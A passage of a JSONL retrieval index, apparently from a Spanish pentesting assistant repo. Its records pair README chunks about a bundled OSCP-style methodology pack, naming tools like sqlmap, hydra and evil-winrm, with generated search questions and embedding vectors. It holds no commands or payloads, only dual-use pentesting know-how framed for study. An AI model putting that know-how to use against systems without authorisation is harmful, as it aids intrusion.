bucles en shell sobre listas de IPs?", "v": [0.10653, -0.02502, -0.15372, 0.05846, -0.13262, -0.23921, -0.04392, -0.05791, -0.14351, -0.04758, 0.01931, 0.03745, 0.02046, -0.04999, -0.05388, 0.04723, -0.20133, -0.16586, 0.00941, -0.14522, 0.01148, 0.00964, -0.19106, 0.02907, -0.0835, 0.10948, -0.09592, 0.11098, -0.08775, -0.09933, -0.1204, -0.08069, -0.0599, -0.00742, -0.07656, -0.10015, 0.05524, 0.05188, -0.03513, -0.0004, -0.12518, -0.0182, -0.05487, 0.07829, 0.038, -0.01066, 0.05141, -0.07401, 0.02179, -0.07089, -0.03139, -0.09233, -0.07018, 0.04543, 0.00095, -0.01056, 0.05989, -0.04713, 0.05528, -0.00246, -0.09574, 0.13951, -0.04733, 0.00797, 0.01845, -0.00252, -0.07965, -0.03268, -0.08001, -0.10312, 0.03985, -0.10725, -0.04044, 0.05173, -0.01354, 0.04357, 0.03677, -0.02221, 0.03719, 0.08166, 0.01795, 0.01488, -0.00019, 0.12989, -0.05253, 0.01155, -0.00961, -0.20253, 0.00621, -0.02323, 0.07806, 0.08291, 0.00554, 0.05883, 0.01822, -0.01312, 0.03557, 0.20478, -0.03432, -0.03245, -0.08025, 0.09537, -0.0764, 0.18331, 0.07371, 0.05888, 0.04423, 0.01536, 0.07746, 0.00727, -0.08249, 0.00934, -0.08164, 0.03043, 0.01532, -0.05089, -0.02107, 0.04807, 0.00301, -0.01421, 0.05328, 0.04737, -0.00224, 0.0433, 0.0519, 0.08063, 0.101, 0.14279, -0.05453, 0.03275, 0.02015, 0.04909, -0.07937, -0.05025, 0.05622, -0.00347, -0.06424, -0.00637, 0.01983, -0.02147, 0.09065, -0.07321, -0.07985, 0.01251, 0.01529, -0.03357, 0.02859, -0.06134, -0.01036, -0.02711, 0.07358, 0.05722, 0.04836, 0.07717, -0.04692, -0.02245, 0.07164, -0.04091, 0.11432, 0.02722, 0.02541, 0.05011, -0.02311, 0.00777, 0.05673, 0.01143, -0.06512, 0.03663, 0.04233, 0.03602, -0.01102, 0.03222, 0.00355, -0.0176, 0.00513, 0.03066, -0.05012, 0.01186, 0.02275, -0.01581, -0.05383, -0.00151, 0.01854, -0.00867, 0.00428, -0.00275, 0.06078, 0.01491, -0.01728, 0.08665, 0.01982, -0.04411, 0.03272, 0.00717, 0.03709, -0.06801, 0.02551, -0.04646, -0.04812, -0.05075, -0.00609, -0.00681, 0.0127, -0.00928, 0.00334, -0.0169, -0.03704, 0.01797, 0.06279, 0.00735, 0.0688, 0.00491, 0.05039, -0.04458, -0.01349, 0.05024, -0.01692, 0.00965, 0.01171, 0.02221, 0.0154, 0.02776, -0.03868, -0.00187, -0.02432, 0.03312, -0.02678, -0.0081, 0.03828, 0.01651, -0.0436, 0.02988, -0.01073, -0.01224, -5e-05, -0.01061, -0.00327, 0.01554, 0.037, 0.02004, 0.00702, 0.05545, 0.02301, -0.04921, -0.01022, -0.05584, -0.02721, 0.02698, -0.01425, -0.06896, -0.08615, 0.00688, -0.02887, -0.02364, -0.02063, -0.0146]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "quΓ© herramientas puedo usar para hacer pentesting y explotar vulnerabilidades web?", "v": [0.12565, 0.07782, -0.22726, -0.07485, 0.00252, 0.05371, -0.03656, -0.06461, -0.01353, -0.1037, -0.12226, -0.01795, -0.08709, -0.01444, -0.0232, 0.09812, -0.02781, -0.10518, 0.08061, -0.07511, -0.06984, -0.07307, -0.12987, -0.05691, -0.13158, 0.0544, 0.04759, -0.01605, -0.13155, 0.08978, -0.10072, 0.07465, 0.02989, 0.00107, -0.05285, 0.05716, -0.02223, 0.04091, 0.09954, 0.06493, 0.06041, 0.02085, -0.14099, 0.05362, 0.0498, 0.00152, -0.0671, -0.09821, -0.00032, 0.07349, -0.07611, -0.11861, -0.19097, -0.08114, 0.06932, -0.04782, 0.25078, -0.16801, 0.00524, -0.04338, -0.06207, 0.05264, -0.01708, -0.00444, -0.00106, -0.09069, -0.01061, -0.00378, -0.11927, 0.17976, 0.03753, 0.03856, 0.04937, 0.07326, 0.05908, 0.01301, -0.03929, 0.05795, 0.01294, 0.00623, -0.05284, 0.07947, -0.00942, 0.03527, -0.12647, -0.10297, 0.10543, -0.06641, 0.04199, -0.09775, 0.08044, 0.05653, -0.05033, -0.06173, -0.00394, -0.07792, 0.05221, 0.03215, 0.054, -0.0082, 0.01943, -0.0246, -0.00468, 0.0697, 0.02844, 0.02823, -0.01648, 0.03553, -0.02634, -0.13011, -0.02676, 0.02756, -0.10297, -0.06308, -0.02964, -0.00401, -0.07255, -0.07581, 0.00346, -0.10582, 0.01451, -0.00696, 0.00971, 0.0001, 0.02351, -0.02242, 0.01885, 0.08086, -0.04316, -0.08379, 0.01258, -0.07866, -0.02178, -0.03135, 0.03326, 0.0104, 0.03177, -0.10055, -0.05242, -0.03656, 0.02303, 0.03553, -0.09824, -0.04596, 0.03349, 0.02901, 0.02387, -0.05958, -0.05471, -0.0074, 0.01387, -0.05339, -0.03425, 0.03425, -0.03004, -0.0326, -0.03469, 0.00751, -0.05065, 0.02011, -0.04727, 0.01107, 0.03095, 0.0567, 0.04328, 0.01666, 0.0388, 0.04571, 0.03476, 0.02018, 0.08488, 0.09876, 0.09668, -0.02556, 0.09769, -0.05328, -0.02715, -0.00931, -0.0285, -0.06859, 0.00957, -0.04739, -0.03918, -0.00969, 0.00915, 0.01757, 0.07494, -0.03768, 0.00659, 0.07004, -0.05132, -0.0111, -0.00246, 0.0196, 0.07379, -0.02874, 0.01918, -0.02329, -0.0229, -0.06978, -0.02736, 0.0095, -0.02528, -0.06641, 0.08841, 0.05356, -0.05628, -0.0478, -0.04197, 0.07039, 0.03929, -0.03706, 0.09349, -0.08352, -0.06667, -0.01154, 0.00696, 0.05791, -0.01783, -0.01562, 0.00637, 0.04647, 0.02312, 0.01707, 0.06027, 0.0763, -0.03834, -0.05317, -0.00982, 0.05477, 0.01804, -0.00667, -0.08784, -0.02295, -0.00361, -0.0517, 0.03793, 0.00571, -0.04781, 0.02696, 0.00633, 0.03742, 0.02005, 0.01397, -0.04062, -0.0438, -0.04396, 0.02148, -0.02814, -0.04716, -0.01292, 0.01054, 0.04679, -0.05234, 0.00182, -0.00879]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "cΓ³mo puedo aprender los comandos reales de seguridad como enumeraciΓ³n o escalada de privilegios sin tener apuntes privados?", "v": [0.24834, 0.12404, -0.08296, -0.1279, 0.06537, -0.07167, 0.03388, -0.07879, -0.12286, -0.10568, -0.03411, -0.03524, -0.00351, -0.0504, 0.13183, 0.00208, 0.09792, 0.10052, 0.04596, 0.01951, 0.11382, -0.1694, -0.08568, 0.01515, 0.07569, -0.05757, 0.09844, 0.05879, -0.02524, -0.00552, 0.00277, 0.11973, 0.01347, -0.07828, -0.05782, 0.02776, 0.0018, 0.0061, -0.04328, -0.00179, -0.07513, 0.05332, -0.05977, -0.02337, 0.10804, -0.0369, -0.02717, 0.10894, 0.00898, -0.11926, 0.05233, -0.02688, 0.03802, -0.24336, -0.03765, -0.03927, 0.16131, 0.10398, 0.01977, -0.04317, -0.09491, -0.02449, 0.06799, 0.05276, 0.05991, -0.045, 0.04659, -0.02313, -0.07606, 0.06612, -0.07871, -0.05726, -0.00948, 0.08483, 0.01205, -0.13897, -0.0038, -0.03035, 0.03445, 0.02073, -0.07637, -0.01976, -0.03341, 0.04745, -0.05761, -0.09764, -0.07215, -0.00922, -0.01355, 0.02858, 0.04914, 0.0612, -0.00255, -0.10962, 0.02851, 0.04682, 0.00117, 0.02053, -0.00327, 0.04126, -0.00028, -0.0601, -0.08354, 0.195, 0.05, 0.10746, 0.01681, -0.05556, -0.00477, -0.05132, -0.03335, 0.00064, -0.00947, 0.04415, -0.09763, -0.02019, -0.08117, -0.07329, -0.02064, -0.06638, -0.0524, -0.07347, 0.06237, 0.03035, 0.04909, -0.02005, -0.07154, 0.09324, 0.04545, 0.01556, -0.03947, -0.01705, 0.07329, -0.01378, 0.01093, 0.06066, -0.04505, -0.0179, -0.06329, -0.14605, 0.06447, 0.01071, -0.06069, -0.06689, 0.0162, 0.07202, 0.00294, -0.08127, -0.07909, -0.00698, -0.04335, -0.01965, -0.01565, 0.07216, 0.04723, -0.06392, -0.02511, -0.08839, -0.01195, 0.14142, 0.00801, 0.0455, -0.00323, -0.07205, 0.04238, -0.0398, -0.004, 0.00411, -0.0573, -0.01631, -0.01223, 0.03436, 0.02318, -0.03156, 0.02767, -0.04384, -0.04857, -0.03329, 0.02051, 0.03236, -0.01323, 0.03901, -0.04041, 0.01391, 0.01778, -0.06922, 0.02518, 0.03305, -0.0019, 0.07335, -0.03616, 0.03963, -0.03982, -0.02317, 0.00147, -0.05452, 0.04197, -0.00343, -0.04831, -0.01171, -0.02048, -0.0227, 0.03933, -0.05109, 0.09054, -0.0641, -0.00798, 0.02274, 0.01589, 0.02623, 0.09239, 0.0034, 0.03215, -0.06873, 0.00719, -0.0491, -0.01157, 0.05071, -0.1063, -0.01361, -0.00345, 0.0454, 0.07534, -0.01584, 0.0109, -0.02544, -0.07534, 0.04534, 0.01494, 0.05746, 0.03309, 0.01153, -0.0512, 0.00409, 0.07641, 0.00268, 0.00726, 0.08589, -0.00333, -0.01493, 0.00406, 0.10128, 0.01797, -0.09588, -0.07054, -0.06539, -0.04483, 0.01954, 0.00576, -0.07646, 0.01251, -0.06993, 0.01661, -0.02775, -0.04299, -0.01715]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "cual es una alternativa libre a las man pages de herramientas como sqlmap, hydra o netexec para ver todas sus opciones?", "v": [-0.03412, -0.056, -0.19754, -0.02846, -0.00771, -0.14612, -0.10879, -0.04441, -0.0631, -0.04258, -0.18773, -0.16101, 0.08798, -0.07323, 0.12157, 0.08093, 0.07231, -0.15104, 0.09033, -0.00018, -0.06062, 0.05661, -0.1894, -0.07414, -0.15172, -0.07515, 0.06485, 0.06696, -0.22661, 0.0168, -0.01652, 0.03685, 0.02471, -0.03755, -0.07273, 0.06793, 0.07153, 0.04721, 0.05331, -0.06394, -0.09173, -0.03581, -0.00718, 0.04415, 0.0296, -0.04756, -0.12056, 0.0505, -0.02505, -0.02395, -0.11797, -0.11208, -0.21424, 0.04836, 0.01552, -0.04943, 0.15188, -0.07859, 0.02646, -0.04524, -0.08045, 0.06749, -0.00294, -0.04408, -0.06464, 0.03155, -0.09734, -0.03897, -0.03709, 0.12215, 0.01047, -0.00481, -0.00125, -0.0829, -0.06754, -0.03651, -0.00829, -0.00606, 0.02078, 0.02587, -0.00227, -0.05064, -0.04836, 0.07882, -0.08906, -0.05615, 0.04083, -0.04428, 0.05617, -0.03607, 0.06085, 0.00269, -0.02022, 0.10917, -0.03432, -0.06655, 0.01501, 0.07251, 0.00924, 0.0282, 0.07782, -0.00364, -0.06852, -0.02255, -0.00916, -0.02088, 0.02827, 0.07508, -0.1131, 0.02035, 0.06211, 0.135, -0.01194, -0.00543, 0.05545, -0.08532, -0.0435, 0.06567, -0.0675, -0.02132, -0.01796, -0.03702, -0.03162, -0.02753, 0.05052, 0.02057, 0.04399, 0.02698, -0.00632, -0.01056, 0.03362, -0.032, -0.05965, -0.09367, 0.01316, -0.04808, 0.04202, -0.03674, 0.00188, -0.04749, -0.01869, 0.06458, -0.03012, -0.08721, 0.01327, -0.05159, -0.03215, -0.00682, -0.04203, -0.06812, -0.06363, -0.05875, 0.059, 0.1193, -0.02224, -0.00423, 0.00176, -0.00917, -0.01488, 0.04637, -0.02373, -0.03739, 0.03479, 0.05461, -0.00426, 0.02305, -0.06866, -0.06441, -0.02063, 0.06514, 0.03982, 0.10752, 0.09785, -0.11301, 0.0284, -0.13437, -0.0457, -0.07474, 0.07762, -0.01852, 0.03627, -0.01502, -0.05625, -0.03287, -0.0312, -0.08977, -0.00261, -0.0346, -0.00485, 0.00429, -0.02871, 0.03699, -0.09335, -0.10677, -0.00383, -0.02351, 0.00156, -0.04009, -0.00793, -0.0669, -0.04964, -0.0559, -0.03223, -0.04765, 0.00533, 0.05145, -0.01388, 0.00762, -0.01764, 0.03833, 0.02578, -0.02657, 0.01697, -0.03836, -0.0648, -0.03276, 0.04348, -0.01879, -0.0009, -0.00044, 0.03059, 0.02269, 0.00793, -0.03778, -0.03922, 0.01183, 0.03432, 0.011, -0.00891, 0.02762, 0.01196, -0.02334, -0.03722, 0.03625, 0.02092, -0.00858, 0.06248, 0.03215, -0.00526, -0.03839, 0.0285, 0.05094, -0.03511, 0.00185, -0.03739, 0.00853, -0.09418, -0.03795, -0.04486, -0.05697, -0.00172, 0.00256, 0.02028, -0.02663, 0.03688, 0.00169]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "quΓ© programa ayuda a mantener la documentaciΓ³n tΓ©cnica actualizada para todos los usuarios?", "v": [0.00393, 0.225, -0.09981, -0.15997, 0.141, -0.13347, 0.00018, -0.07259, -0.09906, -0.00686, -0.16028, -0.1012, 0.03405, -0.06978, 0.00542, -0.12674, 0.09538, -0.12254, 0.12133, 0.02626, -0.00184, 0.01483, -0.09002, -0.0095, -0.11229, -0.03892, 0.06434, -0.16347, -0.09117, -0.02955, 0.055, -0.00956, -0.0825, 0.04704, -0.06746, 0.08259, 0.05284, -0.04145, -0.06706, 0.0521, -0.02614, -0.10707, 0.02108, -0.02489, 0.10745, 0.05754, 0.05784, 0.02887, -0.03883, -0.05073, -0.05635, 0.03843, 0.01505, -0.04767, -0.04939, -0.16759, 0.11505, -0.19053, -0.003, -0.12272, -0.02514, 0.00121, -0.04172, 0.03942, 0.0574, -0.00181, 0.12663, -0.05586, -0.03131, 0.04156, -0.04239, 0.01813, 0.0478, -0.05005, -0.13729, 0.01953, -0.03577, -0.00367, 0.02894, -0.08316, -0.00814, 0.03978, 0.0101, 0.00947, -0.12448, -0.09108, 0.04262, 0.01939, -0.03864, -0.17979, 0.09985, -0.00548, 0.0617, 0.00801, 0.10243, 0.02241, 0.11318, -0.01672, 0.03427, 0.0293, -0.02358, -0.08274, -0.0502, 0.0157, -0.01447, 0.05571, 0.07889, -0.09057, -0.11436, 0.04229, -0.06004, 0.02473, -0.03994, 0.03644, -0.09054, 0.01075, -0.05434, -0.05304, 0.0075, -0.07865, -0.04156, 0.02825, -0.00131, 0.01911, 0.08722, -0.0377, -0.01434, 0.09108, 0.00453, 0.06587, -0.05001, -0.0629, -0.09354, -0.0265, 0.00514, -0.0095, -0.01931, -0.03665, -0.05409, 0.00393, -0.00668, -0.01061, -0.00865, -0.00691, 0.02188, -0.07991, 0.05535, -0.07507, -0.06524, -0.01629, 0.04249, 0.03732, 0.01135, 0.10274, -0.03422, 0.02781, 0.06045, -0.04519, -0.06333, 0.00561, 0.00583, -0.03513, 0.0094, -0.05689, -0.03237, -0.04741, -0.02568, 0.06115, 0.06534, 0.01515, -0.0311, 0.05748, 0.02589, -0.03081, -0.01135, -0.07414, 0.01402, -0.04078, -0.03712, -0.01416, -0.12535, -0.02235, 0.05888, -0.01264, -0.02143, -0.06002, -0.01436, -0.03948, 0.04785, -0.01513, -0.03639, 0.05078, -0.00421, -0.00612, -0.03475, -0.0845, -0.04391, -0.00113, 0.04987, -0.05952, -0.09015, -0.04628, -0.02378, -0.00989, 0.02152, 0.09169, -0.01845, -0.06346, -0.00796, 0.03839, 0.02892, -0.05906, 0.02516, 0.00679, -0.03595, -0.02644, 0.01755, -0.01016, 0.00125, -0.00997, -0.00531, 0.02338, 0.04331, 0.02673, 0.01859, -0.05148, 0.09092, 0.06039, -0.0151, 0.0344, 0.0146, 0.00402, 0.03451, -0.02532, 0.07291, 0.03602, 0.0399, -0.05191, -0.05493, -0.09407, -0.00991, 0.10415, -0.06303, -0.02335, 0.02636, -0.0409, -0.02371, 0.02404, 0.0121, -0.03283, -0.02349, 0.04109, 0.05418, -0.09109, 0.07857, -0.04326]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "con quΓ© herramienta puedo aΓ±adir contenido metodolΓ³gico que se actualice solo cuando alguien hace un commit?", "v": [-0.18875, 0.23374, -0.12225, -0.04235, 0.04215, -0.13822, -0.0851, 0.0148, -0.11039, -0.20035, -0.08123, -0.08105, 0.07425, 0.03056, 0.06644, 0.06134, 0.20524, -0.12149, -0.01336, -0.09898, 0.01459, -0.12583, -0.1191, -0.1635, 0.00533, -0.02687, 0.13896, 0.08294, -0.11115, -0.00586, -0.07965, 0.01809, 0.02548, -0.02156, -0.09, -0.04647, 0.00451, 0.08409, -0.09089, 0.03916, -0.09109, 0.01545, -0.10875, 0.10063, -0.07832, 0.01618, -0.08353, 0.02202, -0.03325, 0.10231, -0.05748, -0.10749, -0.13239, -0.05874, -0.10496, -0.06774, 0.16643, -0.15176, -0.01613, -0.07849, -0.09278, 0.04567, -0.02302, -0.03417, 0.01777, -0.01233, 0.05735, 0.01159, -0.05371, 0.10586, 0.03335, -0.05585, -0.00555, 0.00425, 0.00697, -0.00516, 0.04263, 0.04247, 0.01981, -0.05766, 0.00393, 0.00289, -0.06197, 0.037, -0.0472, -0.06229, 0.07018, -0.09622, 0.04087, -0.09905, 0.00332, -0.01314, -0.00722, -0.07646, 0.04193, -0.02916, 0.08106, -0.02979, -0.03036, 0.01628, 0.12153, -0.02654, -0.07808, 0.02825, 0.00895, 0.0611, 0.02048, -0.02203, -0.02726, -0.05788, 0.02424, 0.03165, 0.0346, -0.01303, -0.06427, 0.03542, -0.02017, 0.03842, -0.0926, -0.1373, -0.00891, 0.03479, -0.06605, -0.03892, 0.01093, -0.05126, -0.01532, 0.0641, 0.02345, -0.0417, -0.02882, 0.00385, 0.06395, -0.02041, 0.02826, -0.02828, 0.02698, -0.06732, -0.033, -0.03316, 0.02881, 0.04104, -0.04704, -0.0965, -0.00712, -0.03566, 0.00888, -0.06058, -0.10138, -0.0568, 0.03397, -0.01649, 0.00931, 0.06445, -0.07619, 0.03082, 0.08652, 0.03368, -0.07336, 0.05158, -0.01468, -0.02335, -0.03502, -0.05604, -0.03742, -0.02616, 0.02605, 0.01629, -0.03315, 0.04277, 0.05905, 0.01624, 0.05483, -0.0635, 0.04167, -0.08086, -0.07288, -0.05444, 0.01752, -0.04315, 0.01297, -0.02451, 0.00785, -0.08599, 0.04812, -0.02963, -0.0086, 0.02711, -0.00597, 0.06979, -0.04933, -0.01309, -0.00427, -0.0264, 0.00464, 0.05997, 0.0077, -0.00267, 0.01327, -0.00068, -0.07885, -0.02324, 0.08069, 0.00769, -0.03446, 0.09745, -0.03696, 0.00922, -0.08271, -0.01367, 0.03285, -0.01328, 0.01673, -0.00876, -0.03974, 0.00181, -0.05009, 0.03894, -0.03209, -0.0164, 0.0517, 0.00101, 0.04645, 0.0261, -0.04706, 0.063, 0.03728, 0.00995, 0.01723, 0.04501, -0.00808, -0.02824, -0.00563, 0.03224, 0.0365, -0.01718, 0.01891, -0.02862, -0.05916, -0.04582, -0.00611, 0.00505, 0.00124, 0.04295, -0.03353, -0.09053, -0.0349, 0.02022, -0.02514, -0.0994, 0.00819, -0.00554, 0.01628, -0.06038, 0.04091, -0.05709]} +{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "cΓ³mo gestionar documentaciΓ³n tΓ©cnica pΓΊblica sin subir apuntes personales privados?", "v": [-0.01325, 0.12231, -0.06603, -0.3044, 0.06506, -0.15519, 0.06643, -0.13386, -0.14066, -0.02921, 0.00185, -0.05978, 0.06021, -0.0555, 0.02122, -0.10966, 0.12391, -0.12625, 0.14979, 0.01662, 0.00225, 0.04579, -0.02112, -0.09399, -0.05413, -0.11769, 0.11047, -0.13776, -0.03006, -0.10554, 0.00148, 0.10834, -0.03247, -0.00494, -0.04381, 0.09404, 0.0301, -0.08411, -0.06249, -0.0391, -0.04066, -0.04436, -0.03881, 0.10965, 0.10934, -0.0309, 0.04811, 0.03956, -0.05954, -0.08337, -0.03161, 0.01111, 0.00698, -0.12676, -0.09646, -0.06139, 0.10662, -0.02766, 0.02979, -0.06924, 6e-05, 0.06173, 0.01866, 0.06076, 0.06976, -0.0137, 0.10711, -0.00451, -0.09276, 0.0507, 0.02478, -0.02176, 0.00715, 0.05031, 0.00826, -0.06046, 0.00294, 0.05264, 0.00113, 0.04117, -0.0683, 0.01835, -0.04983, 0.01503, -0.07472, -0.05781, 0.0159, 0.01232, 0.05337, -0.02603, 0.14152, -0.12912, -0.0168, -0.17009, 0.01889, 0.12048, 0.04092, 0.0043, -0.1035, -0.03887, 0.03095, 0.02393, -0.08649, 0.02668, -0.03434, 0.12576, -0.00547, -0.09745, 0.02234, -0.00788, -0.05414, 0.09316, -0.00132, 0.05728, 0.01953, -0.01119, -0.03989, -0.06488, -0.10962, 0.01575, 0.0322, -0.10675, 0.09515, -0.14126, 0.08376, -0.07855, -0.01958, 0.00229, 0.04474, 0.10237, -0.01457, 0.03679, -0.00701, 0.01545, 0.046, -0.00135, -0.10913, -0.05386, -0.03523, -0.11257, -0.02621, 0.00087, -0.11436, -0.0262, -0.00252, -0.05111, -0.00517, -0.05834, -0.01472, -0.03294, 0.06838, -0.06055, -0.0124, 0.08872, 0.00884, -0.00231, 0.03072, -0.0317, -0.09833, 0.05904, 0.03535, 0.01503, -0.02901, 0.01364, -0.05183, 0.04834, -0.00786, 0.00306, 0.01681, 0.02715, 0.00526, -0.03793, -0.04627, -0.04505, 0.12693, -0.09698, -0.02701, -0.03895, 0.01421, 0.05949, -0.00831, -0.02325, 0.03921, 0.00932, -0.0213, -0.01371, -0.07524, -0.04246, 0.01659, 0.00935, -0.07541, -0.05788, -0.01604, 0.05765, 0.03254, -0.02606, 0.00204, -0.01712, -0.01141, 0.05601, 0.01717, -0.00271, 0.00236, 0.01053, -0.02427, -0.01582, -0.03935, -0.03954, -0.00422, 0.03129, -0.01018, 0.02395, 0.02429, -0.08456, -0.00456, 0.05745, -0.07599, -0.01466, -0.04498, 0.02425, -0.00794, 0.04245, 0.04718, -0.02517, 0.05879, -0.01679, 0.00841, 0.02374, -0.03515, 0.02199, -0.00159, 0.05206, 0.04014, 0.0668, 0.02506, -0.03458, 0.02991, -0.02561, -0.0243, -0.03112, 0.03498, 0.0912, 0.01283, -0.04249, -0.04469, -0.01869, -0.01996, -0.00427, 0.01675, -0.02633, 0.03905, -0.07175, 0.00742, 0.03934, -0.00984, -0.06394]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "que herramientas sirven para hacer pentesting rΓ‘pido en mΓ‘quinas de examen?", "v": [0.08015, 0.04677, -0.12693, -0.23655, -0.0421, -0.06136, -0.08897, 0.02863, -0.02727, -0.06173, -0.15502, 0.111, -0.00308, -0.07849, 0.10735, 0.1617, -0.02616, -0.0384, 0.08648, -0.01167, -0.04555, -0.03716, -0.09737, 0.0266, -0.06495, 0.12212, 0.03722, 0.03687, -0.24977, 0.13695, 0.01554, 0.11175, 0.07129, -0.05679, -0.03911, -0.13204, 0.00057, 0.07874, 0.0574, 0.17668, 0.02599, -0.02374, -0.11966, 0.00563, 0.05678, 0.00153, 0.03572, 0.12186, -0.02952, 0.04758, -0.03789, -0.12797, 0.06851, -0.07766, -0.06365, -0.13876, 0.12156, -0.03818, 0.06483, -0.16189, 0.03075, -0.00984, -0.11361, 0.02096, 0.00695, 0.04178, 0.0324, -0.05232, -0.0367, 0.04974, -0.04054, -0.02977, 0.10974, -0.0113, -0.09111, -0.0798, -0.04621, 0.08992, 0.03094, -0.00433, -0.02672, 0.02985, -0.07415, -0.0267, -0.00319, -0.06357, -0.03873, -0.03406, 0.04029, -0.03118, -0.02835, 0.121, 0.07472, 0.04204, 0.10399, 0.06903, 0.04908, -0.03868, 0.07052, -0.02273, 0.1248, -0.03953, 0.00176, 0.02613, -0.16742, -0.00104, 0.00568, 0.05335, -0.02214, -0.04483, 0.03247, 0.09368, 